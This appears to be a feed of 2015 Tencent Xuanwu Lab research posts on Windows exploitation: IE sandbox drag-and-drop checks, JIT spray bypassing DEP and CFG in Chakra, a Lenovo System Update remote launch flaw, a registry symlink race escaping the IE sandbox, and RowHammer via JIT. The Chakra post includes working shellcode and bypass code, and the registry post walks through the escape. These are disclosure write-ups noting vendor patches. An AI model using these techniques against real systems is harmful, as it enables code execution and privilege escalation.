        result = (CurrentIsAppContainer == TargetIsAppContainer || 
                  TargetIsAppContainer == -1 || 
                  CurrentIsAppContainer == -1) || 
                 SeIsParentOfChildAppContainer(
                    gSessionId, 
                    CurrentIsAppContainer, 
                    TargetIsAppContainer);
    else
        result = 1;
    return result;
}

This function will first determine the integrity level of the source process and the target process. If the integrity level of the source process is lower than that of the target process, reject; if the integrity level of the source process is higher than that of the target process, permit. Next it determines the property of AppContainer. If it equals to the integrity of the source process and is running in AppContainer, then determine if the two satisfy the limits by the SeIsParentOfChildAppContainer function. If it satisfies, permit; if not, reject.

Note: parameters, such as, ProcessIntegrityLevel and IsAppContainer, are extracted from the EPROCESS-Win32Process structure, this is an internal structure. SeIsParentOfChildAppContainer is an internal function in ntoskrnl.

0x06 Summary

This post details the security policy that IE sandbox applies to dragdrop operation, which analyzes the limits policy of IE sandbox for the dragdrop operation, the problems that the Explore process has on dragdrop, the internal principle how ole32.dll implement the dragdrop and how IE implements the dragdrop operation in the sandbox, as well as the position and implementation detail the security limits are put. IE sandbox usually applies effective security limits on the dragdrop operation by hooking specific function in IEShims.dll and the UPI feature in Windows (later than Windows Vista).

0x07 Reference

  1. Understanding and Working in Protected Mode Internet Explorer

  2. OLE Drag and Drop

  3. How to Implement Drag and Drop between Your Program and Explorer

  4. WINDOWS VISTA UIPI

0x08 Acknowledgement

Thanks Wins0n for helping me with ole32 reversing and FlowerCode for helping with my thoughts and solving difficulties.

Translated by WooYun Drops.
]]>
Bypass DEP and CFG using JIT compiler in Chakra engine http://xlab.tencent.com/en/2015/12/09/bypass-dep-and-cfg-using-jit-compiler-in-chakra-engine/ Wed, 09 Dec 2015 05:19:41 +0000 http://xlab.tencent.com/en/?p=80 Continue reading "Bypass DEP and CFG using JIT compiler in Chakra engine"]]>

JIT Spray is a popular exploitation technique first appeared in 2010. It embeds shellcode as immediate value into the executable code the JIT compiler generates. Currently, all major JIT engine, including Chakra, already have many mitigations in place against this technique, such as random NOP instruction insertion, constant blinding, etc.

This article points out two weaknesses in Chakra’s JIT Spray mitigation (in Windows 8.1 and older operating systems, and Windows 10, respectively), allowing attackers to use JIT Spray to execute shellcode, bypassing DEP. I will also discuss a method to bypass CFG using Chakra’s JIT compiler.

0x01 Constant Blinding

Constant Blinding is the most important mitigation strategy against JIT Spray. Chakra engine use a randomly generated key to XOR every user inputted immediate value that is not 0x0000 or 0xFFFF, and decrypts it on the fly. For example, the following JavaScript:

...
a ^= 0x90909090;
a ^= 0x90909090;
a ^= 0x90909090;
...

Generates machine code like this:

...
096b0091 ba555593c5      mov     edx,0C5935555h
096b0096 81f2c5c50355    xor     edx,5503C5C5h
096b009c 33fa            xor     edi,edx
096b009e bab045edfb      mov     edx,0FBED45B0h
096b00a3 81f220d57d6b    xor     edx,6B7DD520h
096b00a9 33fa            xor     edi,edx
096b00ab baef85f139      mov     edx,39F185EFh
096b00b0 81f27f1561a9    xor     edx,0A961157Fh
096b00b6 33fa            xor     edi,edx
...

The immediate value in the resulting machine code is unpredictable, thus shellcode embedding is not possible.

0x02 Bypass Chakra’s Constant Blinding on Windows 8.1 or Older Operating Systems

Internally, for integer n, it is stored as n*2+1 by Chakra engine. When evaluating the expression n=n+m, it is not necessary to restore the original value of n before adding m, its result can be obtained by directly adding m*2 to n*2+1. Chakra engine on Windows 8.1 and older operating systems treat m*2 as self-generated data rather than user input, so constant blinding does not apply. For the following JavaScript code:

...
a += 0x18EB9090/2;
a += 0x18EB9090/2;
...

When some conditions are met, could generate machine code like this:

...
05010090 81c19090eb18    add     ecx,18EB9090h
05010096 0f80d6010000    jo      05010272
0501009c 8bf9            mov     edi,ecx
0501009e 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100a1 f6c301          test    bl,1
050100a4 0f8413020000    je      050102bd
050100aa 8bcb            mov     ecx,ebx
050100ac 81c19090eb18    add     ecx,18EB9090h
050100b2 0f8005020000    jo      050102bd
050100b8 8bf9            mov     edi,ecx
050100ba 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100bd f6c301          test    bl,1
050100c0 0f8442020000    je      05010308
050100c6 8bcb            mov     ecx,ebx
...
0:017> u 05010090 + 2 l 3
05010092 90              nop
05010093 90              nop
05010094 eb18            jmp     050100ae
0:017> u 050100ae l 3
050100ae 90              nop
050100af 90              nop
050100b0 eb18            jmp     050100ca

If we could make each instruction in our shellcode not larger than 2 bytes, it could be embedded in the immediate value. The actual immediate value is 2 times of the value in JavaScript, so the first byte must be an even number if we use a 2-byte instruction, which is not very hard to satisfy.

0x5854   // push esp--pop eax    ; eax = esp, make eax writeable
0x5252   // push edx--push edx   ; esp -= 8
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0x5E52   // push edx--pop esi    ; esi = 0
0x40B6   // mov  dh, 0x40        ; edx = 0x4000, NumberOfBytesToProtect
0x5452   // push edx--push esp   ; *esp = &NumberOfBytesToProtect
0x5B90   // pop  ebx             ; ebx = &NumberOfBytesToProtect
0x14B6   // mov  dh, 0x14
0x14B2   // mov  dl, 0x14
0x5266   // push dx
0x5666   // push si              ; *esp = 0x14140000
0x525A   // pop  edx-push edx    ; edx = 0x14140000
0x5E54   // push esp--pop  esi   ; esi = &BaseAddress, 
0x5454   // push esp--push esp   ; push &OldAccessProtection 
0x406A   // push 0x40            ; PAGE_EXECUTE_READWRITE
0x5390   // push ebx             ; push  &NumberOfBytesToProtect
0x5690   // push esi             ; push &BaseAddress
0xFF6A   // push -1              ; 
0x5252   // push edx--push edx   ; set ret addr
0x5290   // push edx             ; prepare esp for fs:[esi]
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0xC0B2   // mov  dl, 0xC0
0x5E52   // push edx--pop esi
0x5F54   // push esp--pop edi
0xA564   // movs dword ptr [edi], dword ptr fs:[esi] ; *esp = *(fs:0xC0)
0x4FB2   // mov  dl, 0x50        ; NtProtectVirtualMemory, Win8.1:0x4F, Win10:0x50
0x5290   // push edx
0xC358   // pop  eax--ret        ; ret to syscall

0x03 Bypass Chakra’s Constant Blinding on Windows 10

Chakra engine on Windows 10 does not suffer from this issue. But in order to generate highly optimized code, when writing to an integer array, the following JavaScript code:

var ar = new Uint16Array(0x10000);
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
...

Generates the following machine code:

...
0b8110e0 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110e9 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110f2 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110fb 66c786909000009090 mov   word ptr [esi+9090h],9090h
...

To mitigate against JIT Spray, Chakra only allows user to control at most 2 bytes of immediate value. But in this specific situation, the array index and the value being written appear in one instruction. Now we can control 4 bytes instead of 2 bytes of data.

Previously discussed 2-byte shellcode can also be used here. Due to the additional 2-byte 0x00 (which will be interpreted as “add byte ptr[eax], al”), we need to make the eax point to a writable location in the first two instruction.

0x04 Using Chakra Engine to Bypass CFG

By using previously discussed methods, we can do a JIT Spray to bypass DEP, but the shellcode entry point address embedded in the JIT’d code obviously cannot pass the CFG check. But actually, there are implementation flaws in Chakra engine itself that can be exploited to bypass CFG.

There is a fixed entry point function that always gets generated regardless of the need of JIT of the currently executing JavaScript code:

0:017> uf 4ff0000
04ff0000 55          push  ebp
04ff0001 8bec        mov   ebp,esp
04ff0003 8b4508      mov   eax,dword ptr [ebp+8]
04ff0006 8b4014      mov   eax,dword ptr [eax+14h]
04ff0009 8b4840      mov   ecx,dword ptr [eax+40h]
04ff000c 8d4508      lea   eax,[ebp+8]
04ff000f 50          push  eax
04ff0010 b840cb5a71  mov   eax, 715acb40h ; jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>
04ff0015 ffe1        jmp   ecx

This function address can pass the CFG check. Also, before jmp ecx, there is no CFG check of the target address. This can be used as a trampoline for jumping to arbitrary address. We will call it “cfgJumper” hereafter.

0x05 Locating JIT Memory and cfgJumper

Locating the JIT compiled code and the cfgJumper are needed if we want to use JIT Spray to bypass DEP and use cfgJumper to bypass CFG. Interestingly, the method of locating both are almost identical.

Every JavaScript function has a corresponding Js::ScriptFunction object. Every Js::ScriptFunction object also includes a Js::FunctionBody object. Inside this Js::FunctionObject object, a function pointer to the actual function entry point is stored.

If a function is never called, this function pointer points to Js::InterpreterStackFrame::DelayDynamicInterpreterThunk:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@........... // Js::ScriptFunction
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 70181720 00000001 00000000  p..o ..p........ // Js::FunctionBody
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 70181720 l 1
Chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk:
70181720 55              push    ebp

If a function has been called before, but never compiled into JIT’d code, this function pointer points to cfgJumper:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 00860000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00860000
00860000 55          push  ebp
00860001 8bec        mov   ebp,esp
00860003 8b4508      mov   eax,dword ptr [ebp+8]
00860006 8b4014      mov   eax,dword ptr [eax+14h]
00860009 8b4840      mov   ecx,dword ptr [eax+40h]
0086000c 8d4508      lea   eax,[ebp+8]
0086000f 50          push  eax
00860010 b800240870  mov   70082400h ; Chakra!Js::InterpreterStackFrame::InterpreterThunk
00860015 ffe1        jmp   ecx

If a function is regularly called and Chakra compiles it into JIT’d code, this function pointer points to the actual code:

0:002> d 0b89de70 l8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> d 0b8d0000 l8
0b8d0000  6ff6c970 00950000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00950000
00950000 55              push    ebp
00950001 8bec            mov     ebp,esp
00950003 81fc44c9120b    cmp     esp,0B12C944h
00950009 7f18            jg      00950023
0095000b 6a00            push    0
0095000d 6a00            push    0
0095000f 68e0c72c07      push    72CC7E0h
00950014 6844090000      push    944h

With understandings of the internal structure of Js::ScriptFunction and Js::FunctionBody, we could precisely locate the JIT’d code and the cfgJumper.

0x06 Avoiding Randomly Inserted NOP instructions

Other than constant blinding, Chakra engine also employs randomized NOP instruction insertion to mitigate JIT Spray. But the density of the insertion is rather low. Testing code combines 29 16-bit number to form a shellcode, only 29 x86 instructions are generated on Windows 10, with virtually no NOP instruction inserted in between. But in the exploitation method used on Windows 8.1 and older operating systems, about 200 x86 instruction are generated, and highly likely to contain NOP instructions.

To solve this problem:
1. Create a new script tag, put in a JavaScript function that contains JIT shellcode.
2. Call this function in a loop to trigger JIT compilation.
3. Read in compiled code to determine if there is any NOP instruction inserted.
4. If any, destroy the script tag and repeat this procedure.

Testing environments are Windows 8.1 with all updates till May 2015 and Windows 10 TP 9926.
Microsoft informed me that it has been fixed in September 2015.

]]>
A “WormHole” vulnerability on PC http://xlab.tencent.com/en/2015/11/13/wormhole-on-pc/ Fri, 13 Nov 2015 08:15:52 +0000 http://xlab.tencent.com/en/?p=77 Continue reading "A “WormHole” vulnerability on PC"]]>

The WormHole vulnerability that recently has raised security concerns actually comes from a series of inappropriate developing habits. Similar problems are very common on PC, but most of them are mitigated by Microsoft’s default firewall. I wish this post with a lot of discussion on WormHole could more or less enhance the security awareness of some developers.

0x01 Background

The Lenovo ThinkVantage System Update is used to help a user download and install software, drivers and BIOS updates from its server, which significantly reduces the difficulty and workload for a user to update the system. This program is pre-installed on many Lenovo products.

The Lenovo ThinkVantage System Update can download software and updates in many ways based on different network environment and configuration. One of the ways is to download by using file sharing and the main program for this feature is UNCServer.exe. The UNCServer.exe starts with the main routine of System Update and establish a local service side waiting for the main routine connection. In early versions, UNCServer.exe would remain active even when the main routine of System Update exits.

0x02 Problem Description

In System Update 5.6.0.34, UNCServer.exe can provide multiple features by using the Remote mechanism of .NET through the TCP server.

.Net Remoting evolving from DCOM is an older .NET distributed processing technology. It serializes objects and data on the server side, then export. The client crosses the process boundaries to reference the objects on server via HTTP, TCP and IPC. However, the serialization mechanism of Remoting will implicitly export all object methods and properties. Once the client gets the object reference exported from the server side, it’s able to call every method that the server object provides. You can call a server-side object provides all the methods. So the Remoting mechanism is easy to introduce security vulnerabilities, and it’s not recommended to export the Remoting service terminal for clients that are not trusted.

The Connector object exported by UNCServer provides functions including Connect, DownloadBean, IsFileExist, IsFolderExist, GetFilesInFolder, GetSubFolder, QueryFile and LaunchIE. The client can connect and obtain its reference object to perform operations like file downloading or program installation.
Among them LaunchIE won’t verify any parameters, which can be used to start arbitrary process. The actual code is as follows:

case UNCAction.LaunchIE:
        string fileName = (string) eventObj;
        try{
            Process.Start(fileName);
        }
        catch{
        }
        this.connector.Current = (object) true;
    break;

Meanwhile, although System Update only adds outbound rules into the firewall policy, it is bound to 0.0.0.0:20050 due to a lack of necessary configuration on UNCServer. Therefore, when there is no firewall protection, any machine can establish a connection with it, eventually use the provided DownloadBean and LaunchIE functions to download and execute programs remotely.

UNCserver establishes channels on the server side and exports the following code:

IDictionary properties = (IDictionary) new Hashtable();
properties[(object) name] = (object) tvsuuncchannel;
properties[(object) priority] = (object) 2;
properties[(object) port] = (object) 20050;
this.channel = new TcpServerChannel(properties, (IServerChannelSinkProvider) new BinaryServerFormatterSinkProvider());
ChannelServices.RegisterChannel((IChannel) this.channel, false);
this.status = new object();
this.connector = new Connector();
RemotingServices.Marshal((MarshalByRefObject) this.connector, Connector);
this.connector.UNCEvent += new Connector.UNCEventHandler(this.connector_UNCEvent);

0x03 Mitigation

Lenovo released the System Update 5.7.0.13 on September 29th, 2015, which fixes a lot of vulnerabilities including this discussed problem. It implements the LaunchIE and LaunchHelp functions again, and verifies the parameter for the process created. It also improves the configuration on the server that is bound to 127.0.0.1:20050 in order to block remote access.

The following is a part of fixed code:

case UNCAction.LaunchIE:
        try{
            tring str = (string) eventObj;
            Uri result;
            if (Uri.TryCreate(str, UriKind.Absolute, out result)  (result.Scheme == Uri.UriSchemeHttp || result.Scheme == Uri.UriSchemeHttps))
                Process.Start(str);
        }
        catch{
        }
        this.connector.Current = (object) true;
    break;        


IDictionary properties = (IDictionary) new Hashtable();
properties[(object) name] = (object) tvsuuncchannel;
properties[(object) priority] = (object) 2;
properties[(object) port] = (object) 20050;
properties[(object) rejectRemoteRequests] = (object) true;
properties[(object) bindTo] = (object) 127.0.0.1;
this.channel = new TcpServerChannel(properties, (IServerChannelSinkProvider) new BinaryServerFormatterSinkProvider());
ChannelServices.RegisterChannel((IChannel) this.channel, false);
this.status = new object();
this.connector = new Connector();
RemotingServices.Marshal((MarshalByRefObject) this.connector, Connector);
this.connector.UNCEvent += new Connector.UNCEventHandler(this.connector_UNCEvent);

0x04 Summary

Remoting is a previous generation of .NET distributed processing technology, which was already replaced by Microsoft’s WCF technology due to its security defect in design. If there are applications still using Remoting technology for distributed processing or communication, the potential security issues should be noted and any mishandling may introduce security flaws.

Translated by WooYun Drops
]]>
Poking a Hole in the Patch–Escaping from IE Sandbox with a Poorly Patched Vulnerability http://xlab.tencent.com/en/2015/08/27/poking-a-hole-in-the-patch/ Thu, 27 Aug 2015 11:17:55 +0000 http://xlab.tencent.com/en/?p=75 Continue reading "Poking a Hole in the Patch–Escaping from IE Sandbox with a Poorly Patched Vulnerability"]]>

James Forshaw reported a vulnerability to Microsoft regarding Windows Audio Service in November 2014. In our analysis, we discovered that the patch Microsoft release later did not completely solve the problem. With a combination of techniques, we successfully bypassed the patch and can exploit the vulnerability on patched system.

0x00 The Problem

There was a privilege escalation vulnerability in Windows Audio Service, reported by James Forshaw in November 2014.

Windows Audio Service, which manage audio sessions of all the processes running in the system, store audio session configurations under registry key HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig.

For this configuration to be modifiable even by low privileged processes, it recursively set the sub key ACLs to give write access to Low IL processes.

If an attacker sets a symbolic link under this key, and points the symbolic link to a higher-privileged location, Windows Audio Service would make that location controllable by Low IL.

0x01 The Patch

Microsoft released a security bulletin MS14-071, followed by a patch KB3005607, in order to fix this vulnerability.
This patch added two functions, SafeRegCreateKeyEx and DetectRegistryLink.

The following is reconstructed DetectRegistryLink function:

int DetectRegistryLink(const HKEY key_handle, const wchar_t sub_key_path[], HKEY * out_handle)
{
    int detect_result = 0;
    HKEY sub_key_handle;
    LSTATUS status = RegOpenKeyExW(key_handle,
                                   sub_key_path,
                                   REG_OPTION_OPEN_LINK,
                                   KEY_ALL_ACCESS,
                                   &sub_key_handle);

    if (status != ERROR_SUCCESS) {
        if (status == ERROR_FILE_NOT_FOUND) {
            detect_result = 3;
        } else if (status == ERROR_ACCESS_DENIED) {
            detect_result = 4;
        } else {
            detect_result = 5;
        }
    } else {
        DWORD key_type;
        BYTE data[MAX_PATH * 2];
        DWORD data_size = sizeof(data);

        status = RegQueryValueExW(sub_key_handle, 
                                  kSymbolicLinkValueName, 
                                  nullptr,
                                  &key_type, 
                                  data, 
                                  &data_size);

        if (((status == ERROR_SUCCESS) || (status == ERROR_MORE_DATA)) && (key_type == REG_LINK)) {
            detect_result = 1;
        } 
        if ((status == ERROR_FILE_NOT_FOUND) && (detect_result != 1)) {
            HKEY temp_key_handle;
            status = RegOpenKeyExW(key_handle,
                                   sub_key_path,
                                   0,
                                   KEY_READ,
                                   &temp_key_handle);

            RegCloseKey(temp_key_handle);
            detect_result = (status == ERROR_SUCCESS) + 1;
        }

        *out_handle = sub_key_handle;
    }

    return detect_result;
}

DetectRegistryLink has strict check on symbolic links. It first opens the key with flag REG_OPTION_OPEN_LINK, which prevents the redirection, then check for many different cases, including redirection to non-existing keys. After performing all the checks, the key handle is passed out of the function for reuse.

The upper level function SafeRegCreateKeyEx use DetectRegistryLink to check the key for symbolic links before creating new sub key, use NtDeleteKey to delete the symbolic link (with the previously opened handle) if found any, and finally use RegCreateKeyEx to create a new, “safe to use” sub key.

HKEY sub_key_handle;
int detect_result = DetectRegistryLink(key_handle, kSubKeyPath, &sub_key_handle);

if (detect_result == 1) {
    status = NtDeleteKey(sub_key_handle);
    RegCloseKey(sub_key_handle);
    sub_key_handle = nullptr;

    if (!NT_SUCCESS(status)) {
        return ERROR_ACCESS_DENIED;
    }
}

if (detect_result > 3) {
    if (sub_key_handle) {
        RegCloseKey(sub_key_handle);
    }

    return ERROR_ACCESS_DENIED;
}

DWORD create_disposition = 0;

if (sub_key_handle) {
    create_disposition = REG_OPENED_EXISTING_KEY;
} else {
    status = RegCreateKeyExW(key_handle,
                             kSubKeyPath,
                             0,
                             nullptr,
                             0,
                             KEY_ALL_ACCESS,
                             nullptr,
                             &sub_key_handle,
                             &create_disposition);

    if (status != ERROR_SUCCESS) {
        return status;
    }

    if (create_disposition != REG_CREATED_NEW_KEY) {
        RegCloseKey(sub_key_handle);
        return ERROR_ACCESS_DENIED;
    }
}

0x02 The Flaw

There is a serious flaw hidden inside this seemingly strict logic.

After NtDeleteKey deletes the symbolic link, the operating system no longer allow any additional operation to be performed on that key. The already opened handles remain valid, but any operation other than closing the key fails with STATUS_KEY_DELETED.

After the key handle is closed, the remaining operation must create a new key with a new handle. In this situation, the object with the same name is not guaranteed to be the same object.

With a precise timing attack, we could create a symbolic link just before the RegCreateKeyEx operation, bypassing the symbolic link check.

0x03 The Exploit

We take IE 11 sandbox as an example to demonstrate how to escalate privilege with this vulnerability.

To exploit this vulnerability, we first need to make Windows Audio Service perform the delete operation.

We can purposely place a symbolic link under the HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig registry key, and trigger Windows Audio Service to save its configuration.

It is vital to control the timing of the second symbolic link placement. Of course we could create millions of threads trying to win the race, but the operating system already provides us with a handy mechanism.

NtNotifyChangeKey can watch a specific registry key, and signal an event upon certain operation is performed on that key.

By setting a notification on our first symbolic link, we can receive a notification right after it is deleted by Windows Audio Service, and have a chance to create a second symbolic link just before Windows Audio Service calls RegCreateKeyEx.

We can then point the symbolic link to a non-existing GUID under HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy to satisfy the REG_CREATED_NEW_KEY requirement. The target key will be created by Windows Audio Service.

Finally, Windows Audio Service will use upper level key (PolicyConfig)’s ACL to overwrite target key’s ACL, making it controllable by Low IL processes.

At this point the exploitation is successful. We can now write arbitrary AppPath and set Policy to 0x3 to escape from the sandbox.

0x04 The Trick

The registry operation performed by the Windows Audio Service is done after RpcImpersonateClient. Although the race can be successful inside IE sandbox, the registry operation will be performed with the originating process’ token, which do not have sufficient privilege.

James Forshaw did not solve this problem in his original PoC, the registry operation has to be performed by manually starting SndVol.exe.

To solve it we have to find a Medium or higher IL process that uses audio session — basically anything that emits sound — and can be repeatedly triggered to allow multiple retries.

IE Elevation Policy is preloaded with some system applications that can be started inside sandbox with Medium IL, including Notepad.exe. After the Medium IL process is started, the returned handle only have the right to terminate the process. But we can still pass command line parameters.

When Notepad is opening a non-existing file, it displays a dialog asking if the user would like to create that file. The dialog follows a default system sound. This is sufficient to trigger a registry write by Windows Audio Service.

With multiple retries we can ensure successful exploitation.

0x05 The Mitigation

Microsoft completely disabled the creation of registry symbolic link at Low IL in a patch released in August 2015. When setting registry symbolic link, the kernel uses RtlIsSandboxedToken to check the current process’ token, and return STATUS_ACCESS_DENIED on any Low IL or AppContainer token. This rendered any registry symbolic link based exploits unusable at Low IL, and effectively eliminates the possibility of exploiting this vulnerability inside the IE sandbox.

References

  1. Issue 99: IE11 AudioSrv RegistryKey EPM Privilege Escalation – James Forshaw
    https://code.google.com/p/google-security-research/issues/detail?id=99
  2. Vulnerability in Windows Audio Service Could Allow Elevation of Privilege (3005607)
    https://technet.microsoft.com/library/security/MS14-071
  3. Windows 10 Symbolic Link Mitigations – James Forshaw
    https://googleprojectzero.blogspot.com/2015/08/windows-10hh-symbolic-link-mitigations.html
]]>
Research report on using JIT to trigger RowHammer http://xlab.tencent.com/en/2015/06/09/research-report-on-using-jit-to-trigger-rowhammer/ Tue, 09 Jun 2015 02:42:27 +0000 http://xlab.tencent.com/en/?p=72 Continue reading "Research report on using JIT to trigger RowHammer"]]> RowHammer is a problem with some DDR3 in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. However it need to run the customized asm code on target machine to trigger RowHammer, so RowHammer is not easy to be used to attack. We have an idea that try to use script language to trigger RowHammer. If it works, RowHammer will be more dangerous. In order to verify our idea, we analyzed the Java Hotspot, Chrome V8, .NET CoreCLR and Firefox SpiderMonfey.

0x00 Overview

  In a post published on Google Project Zero Blog, researchers explain that the RowHammer technique works by repeatedly accessing memory rows in DRAM to flip bits in adjacent rows. People worry about it because it need to update BIOS to fix this problem, it’s hard to solve. However it need to run the customized asm code on target machine to trigger RowHammer, so RowHammer is not easy to be used to attack.
  We have an idea that try to use script language to trigger RowHammer. If it works, RowHammer will be more dangerous. In order to verify our idea, we analyzed the Java Hotspot, Chrome V8, .NET CoreCLR and Firefox SpiderMonfey.
  Finally we didn’t find useful attack vector. Some of them don’t generate instructions needed to trigger RowHammer, some of them cannot trigger RowHammer due to small amount and slow speed of the instruction generation, some of them need environment modified to trigger so that we cannot use them to attack directly.

0x01 RowHammer

  In this section, we briefly review the root cause of RowHammer, how to trigger it and the limitation we will face with when trying to use it to attack.

1.1 What’s RowHammer?

  RowHammer is a problem with some DDR3 in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. As shown in Figure 1.1(a), DRAM comprises a two-dimensional array of DRAM cells. As shown in Figure 1.1(b), one cell consists of a capacitor and an access-transistor. The access-transistor connects to wordline and the capacitor stores the data. The data in a row can be accessible only if the wordline is in high voltage. The data in the row is transferred to row-buffer. When a wordline’s voltage toggle on and off repeatedly, some cells on nearby rows lose voltage. If it cannot retrain charge for even 64ms, this will lead to lose data.

  Figure 1.2 shows a 2GB rank, whose 256K rows are vertically partitioned into eight banks of 32K rows, where each row is 8KB (64Kb). Each bank has its own dedicated row-buffer. Notice that accessing the rows in different bank is not able to trigger the RowHammer.

Figure 1.1


Figure 1.2

1.2 Trigger RowHammer

  Google Project Zero gives the snippet of code that can cause RowHammer.

  Address of X and Y is very important if you want to trigger RowHammer. X and Y must point to the same bank but different rows. Because each bank has its row-buffer and if we access the same row the wordline will not toggle on and off repeatedly.

  This snippet of the code is available to trigger the RowHammer. But it isn’t the only one we can use. Notice that any code that can toggle the wordline can be used to trigger the RowHammer.

1.3 Instruction needed

  In order to toggle the wordline on and off repeatedly, we have to deal with CPU Cache, if the address we want to access is already in Cache, the wordline will not be set to high voltage.

Instruction Action
CLFLUSH Flush the address form cache
PREFETCH Prefetch the data into the cache
MOVNT* Non-temporal memory access

  The instructions above can be used to access some address and bypass the cache. So using these instructions we can toggle the wordline and trigger the RowHammer.

0x02 Using Script to trigger RowHammer

  The POC that Google Project Zero provides uses ASM code, it can be used to verify whether your devices are vulnerable. We know that most of the script languages have JIT compiler. If we can use the script to control the JIT compiler trigger RowHammer, the things will get worse. We research the Java Hotspot, Chrome V8, .Net CoreCLR and Firefox SpiderMonkey to verify the feasibility of our idea.

2.1 Java Hotspot

  The Java Hotspot Virtual Machine is a core component of the Java SE platform. It implements the Java Virtual Machine Specification. As the Java bytecode execution engine, it also includes dynamic compilers that adaptively compile Java bytecodes into optimized machine instructions. Hotspot is the Stack based virtual machine. The bytecodes are stored in the class file. As the input to hotspot, it is user controllable. What we care about is whether we can customize class file to make the Java Hotspot trigger the RowHammer.
  When Java Hotspot runs Java bytecode, it continually analyzes the program’s performance for “hot spot” which are frequently or repeatedly executed. The JIT compiler would be used to compile these codes.
  The default interpreter that comes with the Hotspot is the so called “Template Interpreter”. A second interpreter existed beside the template interpreter is a C++ interpreter its main interpreter loop is implemented in C++. The JIT compiler in Java Hotspot has three implementation, the client compiler (C1 Compiler), the server compiler (C2 Compiler) and the Shark Compiler ( LLVM based Compiler).


Figure 2.1

2.1.1 Interpreter trigger RowHammer?

a) The working mechanism of template interpreter

  The template interpreter is basically created at runtime from a kind of assembler templates which are translated into real machine code. It interprets a Java program by bytecode. When the interpreter gets a new bytecode, the corresponding native machine code would be called.
  In order to interpret the Java program, Java Hotspot generates a lot of code stub when it starts such as StubRoutines::call_stub and StubRoutines::catch_exception. The command “java -XX:+PrintInterpterter” can be used to show the code stub that could be called in the interpret process.
  Notice that the native machine code stub is a little big. For example, the code size of “invokevitual” is 352 bytes, and the code size of “putstatic” is 512 bytes.

b) Whether the interpreter can trigger RowHammer?

  Whether we can customize the class file to make the Interpreter generate the machine code that we need to trigger the RowHammer. After analysis, we could not find the instructions such as prefetch, clflush and movnt* in the machine codes that generated in the interpreter. So we can’t use the template interpreter to trigger the RowHammer.

2.1.2 JIT Compiler trigger RowHammer?

a) The working mechanism of C1 Compiler

  C1 Compiler is a fast, lightly optimizing bytecode compiler. It performs some value numbering, inlining, and class analysis. It uses a simple CFG-oriented SSA “high” IR, a machine-oriented “low” IR, a linear scan register allocation, and a template-style code generator.
  The compiler is asynchronous, the “CompilerThread” thread in Hotspot compile the method that needed to be compiled. The command “-XX: +CompileThreshold” can be used to set the number of method invocations before compiling.

Figure 2.2

  In the source code of the hotspot,C1 Compiler has such phases:

typedef enum {
  _t_compile,
  _t_setup,
  _t_optimizeIR,
  _t_buildIR,
  _t_emit_lir,
  _t_linearScan,
  _t_lirGeneration,
  _t_lir_schedule,
  _t_codeemit,
  _t_codeinstall,
  max_phase_timers
} TimerName;

C1 Compiler can be briefly described as Figure 2.2 shows:

1) Build HIR

  C1 Compiler iterates the Java bytecodes in the class file and translates it into CFG (Control Flow Graph). The basic block of the CFG uses SSA to represent the instructions. HIR is a “high” IR far from machine code.

2) Emit LIR

  Iterate the basic blocks in the CFG, and iterate the instructions in the basic block. Translate the HIR to LIR. LIR is a “low” IR which is close to machine code.

3) Register allocation

  LIR uses many virtual register, in this phase, the compiler need to allocate the real register. The C1 Compiler uses the linear scan to allocate the register.

4) Machine code generate

  This is the phase to emit code, to genrate the real code. It iterates the instructions in the LIR to generate the machine code. The compile uses the LIR_Assembler class to finish this job, just as blow:

LIR_Assembler lir_asm(this);
lir_asm.emit_code(hir()->code());

  The compiler iterates the LIR_list, invoke each instruction’s emit code. All instructions are the sub class of the LIR_Op. so they have “emit_code” method.

op->emit_code(this);

  Let’s see LIR_Op1, its “emit_code” method is:

void LIR_Op1::emit_code(LIR_Assembler* masm) {    //emit_code
  masm->emit_op1(this);
}

  If the Operand of the LIR_Op1 is “lir_prefetchr”

    case lir_prefetchr:
      prefetchr(op->in_opr());
      break;

  Then it will invoke the prefetchr function, it is platform-dependent, in x86, the code is in assembler_x86.cpp

void Assembler::prefetchr(Address src) {
  assert(VM_Version::supports_3dnow_prefetch(), "must support");
  InstructionMark im(this);
  prefetch_prefix(src);
  emit_byte(0x0D);
  emit_operand(rax, src); // 0, src
}

  At last the compiler will generate the real executable machine code.

b) Whether the C1 Compiler can trigger RowHammer

  Whether the C1 Compiler can trigger RowHammer or not? We actually find the prefetch instruction in X86, it means we have hope to trigger RowHammer.
